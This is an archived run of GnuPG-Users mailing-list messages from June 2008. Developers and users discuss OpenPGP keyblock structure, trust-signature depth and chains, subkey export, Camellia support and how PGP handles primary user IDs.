http://enigmail.mozdev.org iEYEARECAAYFAkhSk8gACgkQ9ymv2YGAKVTKAQCeMB17XYXPxp5O4EkW4sl2U1nO IwcAn3GcCIDin8BaDHoOcs5Zw4khj6Wq =+WJ3 -----END PGP SIGNATURE----- From wk at gnupg.org Fri Jun 13 18:34:24 2008 
From: wk at gnupg.org (Werner Koch) Date: Fri, 13 Jun 2008 18:34:24 +0200 Subject: Signatures stored as information inside a "public key"/certificate? In-Reply-To: <17825579.post@talk.nabble.com> (george.davidescu@gmail.com's message of "Fri, 13 Jun 2008 08:07:12 -0700 (PDT)") References: <17825579.post@talk.nabble.com> Message-ID: <87fxrhb8fj.fsf@wheatstone.g10code.de> On Fri, 13 Jun 2008 17:07, george.davidescu at gmail.com said: > Which is correct? Are signatures an inherent part of the key or are they > stored extrinsically? Lets clarify the terms: - In OpenPGP parlance a "certificate" (as used with X.509) is called a "keyblock". It is perfectly okay to use the term certificate for an OpenPGP public key block - it is the same concept. (Please ignore the fact that OpenPGP also has secret key blocks) A certificate/keyblock consists of several packets, at least one packet is a key and usually you see user ID packet and signature packets as well. This composition of packets makes up the certificate/keyblock. - People often use the term "key" and they usually mean the certificate/keyblock and not the packet with the actual key. - A "keyring" is used by some implementations to store certificates/keyblocks. RFC4880 says (3.6): A keyring is a collection of one or more keys in a file or database. Traditionally, a keyring is simply a sequential list of keys, but may be any suitable database. It is beyond the scope of this standard to discuss the details of keyrings or other databases. Back to your question: Signatures are stored in the keyblock. At least for OpenPGP compliant messages. OpenPGP defines only the interchange format; applications may store it differently. If you export an OpenPGP certificate it is entirely exported with some minor changes (for example signatures marked as non-exportable are removed). In contrast to X.509 the OpenPGP format allows for certain transformations of the certificate without rendering it invalid. 
The armor is just put at the end around the binary certificate/keyblock and only a transport encoding. Shalom-Salam, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From rjh at sixdemonbag.org Fri Jun 13 18:37:28 2008 
From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Fri, 13 Jun 2008 11:37:28 -0500 Subject: Signatures stored as information inside a "public key"/certificate? In-Reply-To: <17825579.post@talk.nabble.com> References: <17825579.post@talk.nabble.com> Message-ID: <4852A248.3000005@sixdemonbag.org> bezna wrote: > I'm having a disagreement with someone over this. From what I've > read, signatures on a "public key" or rather, a certificate, > including the self-signature, are stored as a packet on that key. The > important point: This data (IE all the signatures made on your > certificate) is encoded on the certificate within that block of ASCII > armoured text/binary data when it is exported for someone else to > import in their keyring. Yes. No. Neither. OpenPGP implementations are free to store data however they want. The GnuPG keyring file is just a sequence of OpenPGP octets and packets, but there's no reason why it needs to be this way. Honestly, I'd much rather the data was stored in some kind of easily parseable format, whether it be XML or a simple context-free grammar or what-have-you, but that's neither here nor there. It doesn't make any sense to talk about what's "stored on the keyring" versus what's "stored on the certificate". Neither is well-defined. The only thing that's well-defined is the interoperability format. If your question is really "how does GnuPG do this", well, that gets a bit different. GnuPG's keyring file is essentially a long chain of certificates stored in the interoperability format. If you want to export a key, it just grabs the relevant part of the keyring, strips out local signatures and other installation-specific data, and dumps that. The preceding is a simplification, but as far as I understand it is essentially accurate. dshaw or wk will certainly correct me if I'm wildly wrong, which has been known to happen from time to time. :) From george.davidescu at gmail.com Fri Jun 13 20:35:08 2008 
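The composition Werner Koch and Robert J. Hansen describe above can be seen by walking the packet headers of a keyblock. The following is an added example, not code from the thread or from GnuPG: an RFC 4880 header walker run over a constructed two-certificate keyring with dummy packet bodies; all function and variable names are assumptions.

```python
"""Walk the packet headers of a binary (de-armored) OpenPGP keyblock.

Added illustration, not GnuPG code. The packet bodies are constructed dummy
bytes; only the RFC 4880 section 4.2 header framing is interpreted.
"""

# RFC 4880 section 4.3 tags that occur in a public keyblock.
TAG_NAMES = {2: "signature", 6: "public-key", 13: "user-id",
             14: "public-subkey", 17: "user-attribute"}


def read_header(data, pos):
    """Return (tag, body_start, body_len) for the packet starting at pos."""
    first = data[pos]
    if not first & 0x80:
        raise ValueError("bit 7 of a packet tag octet must be set")
    if first & 0x40:                      # new-format header
        tag = first & 0x3F
        l1 = data[pos + 1]
        if l1 < 192:                      # one-octet length
            return tag, pos + 2, l1
        if l1 < 224:                      # two-octet length
            return tag, pos + 3, ((l1 - 192) << 8) + data[pos + 2] + 192
        if l1 == 255:                     # five-octet length
            return tag, pos + 6, int.from_bytes(data[pos + 2:pos + 6], "big")
        raise ValueError("partial body lengths are only for data packets")
    tag = (first >> 2) & 0x0F             # old-format header
    length_type = first & 0x03
    if length_type == 3:
        raise ValueError("indeterminate length is not handled by this example")
    size = (1, 2, 4)[length_type]
    body_len = int.from_bytes(data[pos + 1:pos + 1 + size], "big")
    return tag, pos + 1 + size, body_len


def walk(data):
    """Return [(packet_name, body_len), ...] for every packet in data."""
    packets, pos = [], 0
    while pos < len(data):
        try:
            tag, start, length = read_header(data, pos)
        except IndexError:
            raise ValueError("truncated packet header") from None
        if start + length > len(data):
            raise ValueError("truncated packet body")
        packets.append((TAG_NAMES.get(tag, "tag-%d" % tag), length))
        pos = start + length
    return packets


def split_keyblocks(packets):
    """Group a keyring-style packet list into keyblocks (certificates).

    Each public-key packet opens a new keyblock; the user IDs, subkeys and
    signatures that follow it belong to that keyblock.
    """
    blocks = []
    for name, _length in packets:
        if name == "public-key":
            blocks.append([])
        if not blocks:
            raise ValueError("packet before the first public-key packet")
        blocks[-1].append(name)
    return blocks


def old_packet(tag, body):
    """Frame body with an old-format header (one- or two-octet length)."""
    if len(body) < 256:
        return bytes([0x80 | (tag << 2), len(body)]) + body
    return bytes([0x80 | (tag << 2) | 1]) + len(body).to_bytes(2, "big") + body


def new_packet(tag, body):
    """Frame body with a new-format header (bodies up to 8383 octets)."""
    n = len(body)
    if n < 192:
        return bytes([0xC0 | tag, n]) + body
    n -= 192
    return bytes([0xC0 | tag, (n >> 8) + 192, n & 0xFF]) + body


# Constructed sample: two certificates back to back, as in a keyring file.
ALICE = (
    old_packet(6, b"\x04" + b"K" * 268)             # primary public key
    + old_packet(13, b"Alice <alice@example.org>")  # user ID
    + old_packet(2, b"S" * 70)                      # self-signature
    + new_packet(2, b"S" * 300)                     # someone else's signature
    + old_packet(14, b"k" * 268)                    # encryption subkey
    + old_packet(2, b"S" * 70)                      # subkey binding signature
)
BOB = old_packet(6, b"K" * 140) + old_packet(13, b"Bob") + old_packet(2, b"S" * 70)
KEYRING = ALICE + BOB

if __name__ == "__main__":
    for block in split_keyblocks(walk(KEYRING)):
        print(" ".join(block))
```

ASCII armor would wrap these same bytes in base64; the packet sequence inside is unchanged.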
From: george.davidescu at gmail.com (bezna) Date: Fri, 13 Jun 2008 11:35:08 -0700 (PDT) Subject: PGP doesn't import trust signatures w/ depth > 8 on keys exported with GPG Message-ID: <17829687.post@talk.nabble.com> Hi, I'm using PGP Desktop 9.8 and I noticed when I export a public key from GPG and import it in PGP, any trust signatures made on it with GPG and given a depth greater than 8 are lost. Presumably this is because of constraints within PGP, IE the maximum trust depth that can be set in PGP for a signature is 8. I was wondering if anyone can provide a rationalization for why this is? Ostensibly even a trust signature of depth 2 carries enormous power with it, but there is no such cap on GPG. Furthermore, why are signatures in GPG with a trust depth greater than 9 marked as a 'T' on listings, even though the depth of the signature still matters (e.g. a trust signature with a depth of 14 is still more powerful than one of depth 12, even though they're both labelled 'T'). Many thanks, George P.S. Sorry about the flurry of questions recently. I'm new to GPG and PGP, have searched the list archives but I'd like to have greater in-depth knowledge on some issues. -- View this message in context: http://www.nabble.com/PGP-doesn%27t-import-trust-signatures-w--depth-%3E-8-on-keys-exported-with-GPG-tp17829687p17829687.html Sent from the GnuPG - User mailing list archive at Nabble.com. From rjh at sixdemonbag.org Fri Jun 13 20:42:51 2008 
From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Fri, 13 Jun 2008 13:42:51 -0500 Subject: PGP doesn't import trust signatures w/ depth > 8 on keys exported with GPG In-Reply-To: <17829687.post@talk.nabble.com> References: <17829687.post@talk.nabble.com> Message-ID: <4852BFAB.50306@sixdemonbag.org> bezna wrote: > I was wondering if anyone can provide a rationalization for why this > is? This is the GnuPG-Users list, not PGP-Users. Generally speaking, we are not experts on the internal workings of PGP. You're better off asking PGP Corporation. From dshaw at jabberwocky.com Fri Jun 13 21:03:24 2008 
From: dshaw at jabberwocky.com (David Shaw) Date: Fri, 13 Jun 2008 15:03:24 -0400 Subject: PGP doesn't import trust signatures w/ depth > 8 on keys exported with GPG In-Reply-To: <17829687.post@talk.nabble.com> References: <17829687.post@talk.nabble.com> Message-ID: <20080613190323.GB3936@jabberwocky.com> On Fri, Jun 13, 2008 at 11:35:08AM -0700, bezna wrote: > > Hi, > > I'm using PGP Desktop 9.8 and I noticed when I export a public key from GPG > and import it in PGP, any trust signatures made on it with GPG and given a > depth greater than 8 are lost. Presumably this is because of constraints > within PGP, IE the maximum trust depth that can be set in PGP for a > signature is 8. > > I was wondering if anyone can provide a rationalization for why this > is? I could make a guess (8 is a huge depth already and so they capped it there to simplify things?), but it would really be just a guess. I suggest contacting the PGP folks and asking them. They're a very responsive company. Let us know what you find out. > Ostensibly even a trust signature of depth 2 carries enormous power with it, > but there is no such cap on GPG. Furthermore, why are signatures in GPG with > a trust depth greater than 9 marked as a 'T' on listings, even though the > depth of the signature still matters (e.g. a trust signature with a depth of > 14 is still more powerful than one of depth 12, even though they're both > labelled 'T'). This one I can answer, as I wrote that part of the code. The reason that GPG marks signatures with a depth greater than 9 as 'T' in a signature listing is simply because the signature listing is formatted, and I only had room for a single digit without reformatting the display. Thus, 'T' in this case just means "more than 9". Note that this is strictly a display convention, and the internal trust calculations use the real number of course. David From dshaw at jabberwocky.com Fri Jun 13 21:12:20 2008 
From: dshaw at jabberwocky.com (David Shaw) Date: Fri, 13 Jun 2008 15:12:20 -0400 Subject: Camellia In-Reply-To: <48515F08.2010801@bellsouth.net> References: <20080612143926.1F21B118040@mailserver5.hushmail.com> <48515F08.2010801@bellsouth.net> Message-ID: <20080613191220.GC3936@jabberwocky.com> On Thu, Jun 12, 2008 at 01:38:16PM -0400, John W. Moore III wrote: > vedaal at hush.com wrote: > > > how hard would it be to write a patch for an option of > > --try-all-symmetrics > > or > > --use-symmetric-name > > that would ignore the cipher number and try all of them, > > or try only the one specified ? > > > > ( disclaimer: > > *not* a feature request for the gnupg team :-) > > > > only a workaround thought > > for the hackers who choose to enable Camellia now ) > > FWIW, vedaal, Camellia 128, 192 & 256 have been incorporated into the > GnuPG Source already. They have been assigned the placeholders S11, S12 > & S13 respectively. There are already 'hackers' [risk takers?] who have > built GnuPG with these algorithms enabled. [Werner, David & Marcus > collectively shudder] Well, I do reserve the right to point and laugh if someone ignores the warnings and ends up losing data (for cripes sake, GPG with Camellia even prints out a warning every time you run it). The Camellia draft has been submitted for sponsorship in the IETF (see it at http://www.ietf.org/internet-drafts/draft-ietf-openpgp-camellia-03.txt). Pretty soon there will be official Camellia support and the warnings will go away. David From dshaw at jabberwocky.com Fri Jun 13 21:39:20 2008 
From: dshaw at jabberwocky.com (David Shaw) Date: Fri, 13 Jun 2008 15:39:20 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <48502A51.5030804@rickv.com> References: <48502A51.5030804@rickv.com> Message-ID: <20080613193920.GA4107@jabberwocky.com> On Wed, Jun 11, 2008 at 03:41:05PM -0400, Rick Valenzuela wrote: > I'm now confused about creating a separate subkey for encrypting, as > opposed to creating one keypair that signs and encrypts. The example > I've seen around is that if you're set up the subkey way and the police > demand the private part of your key, you don't have to sacrifice your > primary key, which carries all your signatures. (I hope I said that > correctly.) The signatures are actually on both the primary key and your user IDs, but that's basically correct. > Well, I understood that as meaning I would have separate passphrases for > the subkey and the primary key: Apparently, that's not possible. So then > how would this police scenario play out? If supposing then that TSA or > some entity forces me to give up my passphrase for decryption purposes, > then I've compromised everything, no? GPG (somewhat) supports different passphrases on subkeys and primary keys. The catch is that it does not generate such a key itself, so if you want it, you have to generate it manually. An easy way to handle the police scenario you give is to remove the passphrase from your key, use --export-secret-subkeys to export just the subkeys to a file, then put the passphrase back on your key. Give the police the subkey file, and you're done. They then have the ability to decrypt, but don't have your primary key. That's just talking crypto, of course. If it ever comes down to this in the real world, I'd recommend talking to a good lawyer before you do anything. David From dshaw at jabberwocky.com Fri Jun 13 22:19:00 2008 
From: dshaw at jabberwocky.com (David Shaw) Date: Fri, 13 Jun 2008 16:19:00 -0400 Subject: Remove public key from secret key In-Reply-To: References: Message-ID: <20080613201900.GB4107@jabberwocky.com> On Mon, Jun 09, 2008 at 11:46:28PM -0400, Ivan Peev wrote: > Hello Guys, > > Is there a way to export the secret key without the public key or remove the > public key from exported secret key? I'm trying the following scenario: > > 1. Encrypt data with particular public key on one machine. > 2. Decrypt data with related secret key on another machine. > > Basically I don't want someone to be able to generate data, which can be > decrypted with the related secret key. No. You can strip the public key data from the secret key, but then the key is unusable (it's not a "OpenPGP key" any longer) until you restore the public key data. David From dshaw at jabberwocky.com Fri Jun 13 23:42:55 2008 
From: dshaw at jabberwocky.com (David Shaw) Date: Fri, 13 Jun 2008 17:42:55 -0400 Subject: Questions about trust signatures In-Reply-To: <17789248.post@talk.nabble.com> References: <17789248.post@talk.nabble.com> Message-ID: <20080613214255.GD4107@jabberwocky.com> On Wed, Jun 11, 2008 at 04:10:28PM -0700, bezna wrote: > > Dear GnuPG users, > > I have some questions regarding use of the tsign command; please don't feel > you have to answer all of them at once, just one will do, although I'd like > to point out that the one most important to me is #1. I've been doing some > reading and experimentation with tsign and I think I have a handle on how > the mechanics of it work. > > A brief aside: David Shaw posted a message > (http://lists.gnupg.org/pipermail/gnupg-users/2005-May/025612.html ) > providing a link to an article which apparently explained trust signature > concepts well ( > http://download.cryptoex.com/documents/whitepaper/cex2003-pgp-in-unternehmen-en/Tech%20White%20Paper%202002%20-%20Using%20OpenPGP%20in%20Corporations.pdf > ). However, the link appears to be down and searches for the article have > turned up nothing. Does anyone (perhaps David himself) have a copy of it, or > know where I can obtain it? Thanks in advance; now, my questions: Internet Archive has it: http://web.archive.org/web/20050315031244/http://download.cryptoex.com/documents/whitepaper/cex2003-pgp-in-unternehmen-en/Tech+White+Paper+2002+-+Using+OpenPGP+in+Corporations.pdf You might also look around in the PGP.com white paper library for similar information. The PGP company bought the Cryptoex company a while back, so PGP may have migrated some of the white papers over to their own site. > 1) My first question revolves around its application in a real-life > scenario. Suppose we have a strictly hierarchical environment, where the > validation of certificates depends solely on CAs. 
In such a scenario, would > the users perform trust signatures of a certain level on the CAs, who would > then perform trust signatures on CAs lower in the hierarchy (and thus lower > in power, since with each link in the trust signature chain the "trust > power" represented by the depth allotted to the tsig diminishes until it > reaches 1, the terminal value, beyond which the trust chain cannot be > extended through empowering other users with tsigs). Consider the following > example: > > User 1 - tsig of depth 2 --> Root CA - tsig of depth 1 --> Subordinate CA - > regular signature --> User 2 > > Thus, through this chain of trust, User 2's certificate appears valid to > User 1. A similar chain could be traced from User 2 to User 1, or between > any other two users in the organization, using the Root CA as a hub for > trust signatures; alternatively, only the subordinate CA could be the > trusted entity by the users, in the case where that CA is responsible for a > department and users don't care about the validity of all the certificates > of users outside their own branch in the organization. > > So my first question is, have I understood the use of this command in a > real-world environment correctly? Yes, you have. > Are there other ways in which it could be > applied? Can it be applied in a non-hierarchical context? What I mean by > this is, is there some way to get rid of this "depth" functionality and to > be able to propagate trust continuously and indefinitely down a chain of > users, without having it diminish until it reaches an endpoint? For example > ( --> denotes a signature, ==> denotes trust) : > > A ==> B ==> C ==> D --> E > > Through this chain of trust, Eve's certificate appears valid to Alice. The > implementation of this example using GPG trust signatures would involve > using descending orders (the "depth" parameter) of trust signatures with > each hop: > > A =3=> B =2=> C =1=> D --> E No. 
The problem here is the use of the word "indefinitely". Without the depth concept, anyone in the chain can make a signature beyond their "signing privilege" (for lack of a better term). For example, using the chain above, let's say that Alice is the regular user, Baker is the company-wide Root CA, Charlie is a VP, and Dorothy is a Manager, who manages Eve. Note now in the example you give above, Dorothy cannot issue a trust signature to Eve - just a regular signature. If there was no depth limiting it, Dorothy could go rogue and issue a trust signature to an attacker who could then issue more trust signatures, etc. The depth (along with the domain restriction) prevents people from further down in the chain from doing things that you, the head of the chain, (Alice in this example) don't want to accept. To be clear, note that nothing stops Dorothy from issuing such a signature. It's just that when resolving the chain **from the perspective of Alice**, Dorothy's signatures are limited to a single hop. Even if she issues a signature with a depth of 99, when looked at as part of the chain above, the depth will appear to be 1. When looked at from the perspective of someone else, the results may be different. > Obviously this "depth" parameter is better suited to the CA > example outlined earlier; it might not be possible for Alice (or any > other user in the chain) to know how many hops away Eve is, and what > depth to tsign Bob with so that she will validate Eve's > certificate. Another way for Alice to handle the problem is rather than signing it, simply to mark the CA key as "ultimately trusted". This avoids Alice having to know the depth of the chain, as it will cause any signature by the CA to be treated as if it was issued by Alice herself. This can be thought of as an infinite-depth trust signature if you like. 
> Furthermore, if Bob tsigned Carmen with a depth of 4 (for his own > purposes), the chain of trust linking Eve to Alice would be broken > since GPG computes certificate validity (and trust in the case of > tsigns) only down paths where each next node in the path was tsigned > with a lower "depth" than the "depth" of the tsign on the > node before it. The chain isn't broken, the depth at each step is just lowered to match the perspective of the head of the chain (Alice in this case). If Bob tsigns Carmen, then from Bob's perspective, that chain in the link had a depth of 4. Similarly, if Roger signs Bob's key with a depth of 5, then we have a new chain from Roger's perspective where the Bob->Carmen link also has a depth of 4. If Roger signed Bob's key with a depth of 4, then the Bob->Carmen link has a depth of 3 (as it is lowered to match the maximum depth granted by Roger). If Roger signed Bob's key with a depth of 50, then the Bob->Carmen link has a depth of 4 (as it can't be larger than what Bob granted). > Is there some way to circumvent this in GPG, short of writing your own code? > Does the PGP Corporation's program offer any alternatives? Both GPG and PGP handle this essentially the same way. You can always run with an external trust model by disabling trust in GPG, and doing the work externally, but it won't be compatible with the rest of the world. > That was the main question I wanted to address. Now, here are some other > issues I have with tsign: > > 2) I noticed that when two disjoint, continuous (not broken by a tsign > assigning only "marginal" trust somewhere) paths of tsigns of the same > length lead to the same certificate at the end of the path, the signature > which was last made is taken into computing that terminal certificate's > trust rating, rather than some other criteria. 
This is hard to explain > without an example, so here it is: >
>      Root CA 1 --> CA 1
>     /                  \
>    A                    B --> C
>     \                  /
>      Root CA 2 --> CA 2
> > Bob's certificate has been validated in two companies he works for. Alice > wishes to find the validity of Charlotte's certificate, who was signed by > Bob. She has tsigned the Root CAs of both companies (with a depth of 3 for > the sake of the example). Now, the subaltern CA (tsigned with a depth of 2) > of Company 1 has tsigned Bob (with a depth of 1) and specified that he was > fully trustworthy when it came to validating certificates. The subaltern CA > of Company 2 though, had also tsigned Bob but according to him Bob is only > marginally trustworthy. > > According to the current GPG implementation, CA2's signature which is the > most recent would be used in determining Bob's ownertrust in Alice's trust > database! Consequently Charlotte's certificate would appear marginally > valid. This to me seems flawed. If CA1's signature was made before CA2's > (assume CA1 is a procrastinator), then Bob would appear as fully trustworthy > to Alice and Charlotte would be validated. The fact that Bob's > trustworthiness to Alice hinges on which CA got his signature in last seems > like a bad approach to me. All approaches here are bad approaches, as one can always come up with an example where the answer you want contradicts the answer you want from another example. Most recent is at least consistent and reliable. > 4) What do the "12x" and "13x" mean in the following --with-colons > --list-sigs output? >
> sig:::17:2E62D2D5026D69FA:2008-06-11::6 120::David:13x:
> sig:::17:1816F82A9DE5372F:2008-06-11::1 60::Larry:12x:
It says how much the signer verified the key before signing it. It is really a cosmetic difference since GPG mainly ignores those numbers. See "--default-cert-level" in the manual for more. 
> 5) As in question 2, I noticed that if there are two disjoint paths of > tsigns that lead to the same certificate and one path is shorter (suppose > Root CA 2 signed Bob's certificate directly), the shorter path is preferred > over the longer one. Are there any other rules for determining which path of > tsigns is used, using criteria such as the level of certitude in the > signature (3 for "checked very carefully", 2 for "checked casually", or 1 > [or 0]), the depth of the signature, and so on? The only other "rule" I > seemed to find was the one mentioned in question 2, with the newest trust > signature winning over the older ones. Shorter wins. The reason for this is that a long chain is a fragile chain: each additional link adds risk of someone doing something untoward. David From rick at rickv.com Sun Jun 15 08:55:32 2008 From: rick at rickv.com (Rick Valenzuela) Date: Sun, 15 Jun 2008 02:55:32 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <20080613193920.GA4107@jabberwocky.com> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> Message-ID: <4854BCE4.7080204@rickv.com> Hah, good point. And should it ever come down to that, I hope access to a lawyer is possible (and worthwhile) at that point. But both your and Matt's suggestions are good to have in the playbook. The border trick is a pretty good precaution (groan). Rick David Shaw wrote: > An easy way to handle the police scenario you give is to remove the > passphrase from your key, use --export-secret-subkeys to export just > the subkeys to a file, then put the passphrase back on your key. Give > the police the subkey file, and you're done. They then have the > ability to decrypt, but don't have your primary key. > > That's just talking crypto, of course. If it ever comes down to this > in the real world, I'd recommend talking to a good lawyer before you > do anything. > > David From peter at digitalbrains.com Sun Jun 15 15:43:52 2008 
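David Shaw's depth figures for the Roger, Bob and Carmen chain in the trust-signature reply above, worked as an added example that is not GnuPG's trust code. It assumes the simplified rule those figures imply (a hop passes on at most one less than it received, and never more than its signer stated); Mallory and Trent are constructed names, and trust amounts, domain restrictions and competing paths are left out.

```python
"""Trust-signature depth as seen from the head of a chain.

Added illustration of the clamping rule described in the message, not
GnuPG's trust-database code. It models a single chain only.
"""


def resolve(chain):
    """Resolve one chain of signatures from the first signer's perspective.

    chain: list of (signer, signee, stated_depth) hops, head first.
    stated_depth 0 is an ordinary signature, >0 is a trust signature.
    Returns [(signee, effective_depth), ...] for the hops that count.
    """
    seen = []
    budget = None                        # effective depth of the previous hop
    for signer, signee, stated in chain:
        if seen and seen[-1][0] != signer:
            raise ValueError("hops do not form a chain at %r" % signer)
        if budget is None:
            effective = stated           # the head's own signature, as issued
        elif budget < 1:
            break                        # signer is valid but may not introduce
        else:
            effective = min(stated, budget - 1)
        seen.append((signee, effective))
        budget = effective
    return seen


def link_depth(chain, signee):
    """Effective depth of the hop onto signee, or None if it does not count."""
    return dict(resolve(chain)).get(signee)


def valid_keys(chain):
    """Keys the head of the chain ends up treating as valid."""
    return [signee for signee, _ in resolve(chain)]


def roger_chain(depth_on_bob):
    """Roger tsigns Bob with the given depth; Bob tsigned Carmen with 4."""
    return [("Roger", "Bob", depth_on_bob), ("Bob", "Carmen", 4)]


# The A =3=> B =2=> C =1=> D --> E chain with the names used in the reply.
ALICE_CHAIN = [
    ("Alice", "Baker", 3),
    ("Baker", "Charlie", 2),
    ("Charlie", "Dorothy", 1),
    ("Dorothy", "Eve", 0),
]

# Constructed variant: Dorothy issues a deep trust signature to Mallory,
# who then signs Trent. From Alice's side only Dorothy's single hop counts.
ROGUE_CHAIN = ALICE_CHAIN[:3] + [
    ("Dorothy", "Mallory", 99),
    ("Mallory", "Trent", 99),
]

if __name__ == "__main__":
    for granted in (5, 4, 50):
        print("Roger->Bob depth", granted,
              "=> Bob->Carmen seen as", link_depth(roger_chain(granted), "Carmen"))
    print("valid to Alice:", valid_keys(ALICE_CHAIN))
    print("valid to Alice (rogue case):", valid_keys(ROGUE_CHAIN))
```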
From: peter at digitalbrains.com (Peter Lebbing) Date: Sun, 15 Jun 2008 15:43:52 +0200 Subject: Remove public key from secret key In-Reply-To: References: Message-ID: <48551C98.3070809@digitalbrains.com> Ivan Peev wrote: > Is there a way to export the secret key without the public key or remove > the public key from exported secret key? I'm trying the following scenario: > > 1. Encrypt data with particular public key on one machine. > 2. Decrypt data with related secret key on another machine. > > Basically I don't want someone to be able to generate data, which can be > decrypted with the related secret key. At least with RSA, the public key can be computed with just the secret key. So it would never be cryptographically secure, it only takes some effort on the part of the attacker to break the scheme. I obviously don't know your exact requirements, but instead of trying to make something designed to be public private, perhaps this will accomplish your goal: Create two keypairs, A and B. The machine mentioned under point 1. above has the public key of keypair A and the private key of keypair B. The machine mentioned under point 2. has the private key A and public key B. The program encrypting on machine 1. encrypts to key A and signs with key B. The program decrypting on machine 2. only accepts data encrypted to key A and /signed with key B/. Now someone with access to the keyring on machine 2. cannot create encrypted data that is accepted by the decryption program, because he cannot sign it with key B. HTH, Peter Lebbing. -- I'm using the GNU Privacy Guard (GnuPG) in combination with Enigmail. You can send me encrypted mail if you want some privacy. My key is available at http://wwwhome.ewi.utwente.nl/~lebbing/pubkey.txt From faramir.cl at gmail.com Sun Jun 15 20:31:20 2008 
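One way the decrypting program on machine 2 in Peter Lebbing's scheme can enforce "signed with key B", as an added example that is not from the thread or from GnuPG: it reads the machine-readable lines that `gpg --status-fd` emits and pins the signer's fingerprint. The fingerprints, sample status output and function names are constructed.

```python
"""Accept a decrypted message only if it was signed by the pinned key B.

Added illustration, not part of GnuPG. The sample status output and the
fingerprints below are constructed.
"""
import os
import subprocess

PREFIX = "[GNUPG:] "
# Status keywords that mean a signature was present but must not be trusted.
REJECT = {"BADSIG", "ERRSIG", "EXPSIG", "EXPKEYSIG", "REVKEYSIG"}


def parse_status(text):
    """Return [(keyword, [args...]), ...] for every status line in text."""
    events = []
    for line in text.splitlines():
        if line.startswith(PREFIX):
            fields = line[len(PREFIX):].split()
            if fields:
                events.append((fields[0], fields[1:]))
    return events


def accept(status_text, signer_fpr):
    """True only for: decrypted OK, exactly one valid signature, made by B."""
    events = parse_status(status_text)
    keywords = {keyword for keyword, _ in events}
    if "DECRYPTION_OKAY" not in keywords or keywords & REJECT:
        return False
    signers = []
    for keyword, args in events:
        if keyword == "VALIDSIG" and args:
            # The tenth field, where present, is the primary key fingerprint;
            # otherwise fall back to the signing key fingerprint (first field).
            fpr = args[9] if len(args) >= 10 else args[0]
            signers.append(fpr.upper())
    return signers == [signer_fpr.upper()]


def decrypt_and_check(path, out_path, signer_fpr):
    """Run gpg on path; keep out_path only if the signer check passes."""
    proc = subprocess.run(
        ["gpg", "--batch", "--status-fd", "1", "--output", out_path,
         "--decrypt", path],
        stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, text=True)
    ok = proc.returncode == 0 and accept(proc.stdout, signer_fpr)
    if not ok and os.path.exists(out_path):
        os.remove(out_path)      # gpg has already written the plaintext
    return ok


KEY_B = "B" * 40                 # constructed fingerprint of signing key B
OTHER = "C" * 40                 # constructed fingerprint of some other key


def sample(*signature_lines):
    """Constructed status output for a message encrypted to key A."""
    lines = ["[GNUPG:] ENC_TO AAAAAAAAAAAAAAAA 16 0",
             "[GNUPG:] BEGIN_DECRYPTION",
             *signature_lines,
             "[GNUPG:] DECRYPTION_OKAY",
             "[GNUPG:] END_DECRYPTION"]
    return "\n".join(lines) + "\n"


def validsig(fpr):
    return "[GNUPG:] VALIDSIG %s 2008-06-15 1213537432 0 3 0 17 2 00 %s" % (fpr, fpr)


SIGNED_BY_B = sample("[GNUPG:] GOODSIG BBBBBBBBBBBBBBBB machine-1 (constructed)",
                     validsig(KEY_B))
UNSIGNED = sample()              # what anyone holding public key A can produce
SIGNED_BY_OTHER = sample("[GNUPG:] GOODSIG CCCCCCCCCCCCCCCC other (constructed)",
                         validsig(OTHER))
TAMPERED = sample("[GNUPG:] BADSIG BBBBBBBBBBBBBBBB machine-1 (constructed)")

if __name__ == "__main__":
    for name in ("SIGNED_BY_B", "UNSIGNED", "SIGNED_BY_OTHER", "TAMPERED"):
        print(name, accept(globals()[name], KEY_B))
```

Successful decryption alone proves nothing about the sender here, since key A's public half is available on machine 2; the fingerprint comparison is what carries the scheme.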
From: faramir.cl at gmail.com (Faramir) Date: Sun, 15 Jun 2008 14:31:20 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <4854BCE4.7080204@rickv.com> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> Message-ID: <48555FF8.8060705@gmail.com> Rick Valenzuela wrote: > Hah, good point. And should it ever come down to that, I hope access to > a lawyer is possible (and worthwhile) at that point. But both your and > Matt's suggestions are good to have in the playbook. The border trick is > a pretty good precaution (groan). > > Rick > > David Shaw wrote: ... >> That's just talking crypto, of course. If it ever comes down to this >> in the real world, I'd recommend talking to a good lawyer before you >> do anything. Well, I suppose in most "civilized" countries you have the right to have access to a lawyer if you have legal troubles. But it is a good idea to keep in mind there are places where that is unlikely to work... Regards From j.lysdal at gmail.com Sun Jun 15 22:14:28 2008 
From: j.lysdal at gmail.com (Jorgen Lysdal) Date: Sun, 15 Jun 2008 22:14:28 +0200 Subject: PGP bug? Does not recognize primary uid Message-ID: <48557824.6050508@gmail.com> I was just playing around with latest version of PGP (9.8.2) for Mac, imported my key from gpg. It appears that PGP does not recognize what uid is the primary one. It just shows the oldest first. Is there more than one way to specify primary uid, or is it just one of the endless waterfall of ridiculous bugs in PGP? From rjh at sixdemonbag.org Sun Jun 15 23:22:49 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Sun, 15 Jun 2008 16:22:49 -0500 Subject: PGP bug? Does not recognize primary uid In-Reply-To: <48557824.6050508@gmail.com> References: <48557824.6050508@gmail.com> Message-ID: <48558829.7060504@sixdemonbag.org> Jorgen Lysdal wrote: > I was just playing around with latest version of PGP (9.8.2) for Mac, > imported my key from gpg. It appears that PGP does not recognize what > uid is the primary one. It just shows the oldest first. Is there more > than one way to specify primary uid, or is it just one of the endless > waterfall of ridiculous bugs in PGP? There are five answers here: (a) This is a PGP question, not a GnuPG question. (b) GnuPG is performing correctly. (c) PGP is performing correctly. (d) Implementations are given leeway in deciding how to interpret a primary userID. (e) This behavior is not a bug, much less a ridiculous one. From j.lysdal at gmail.com Mon Jun 16 16:11:04 2008 
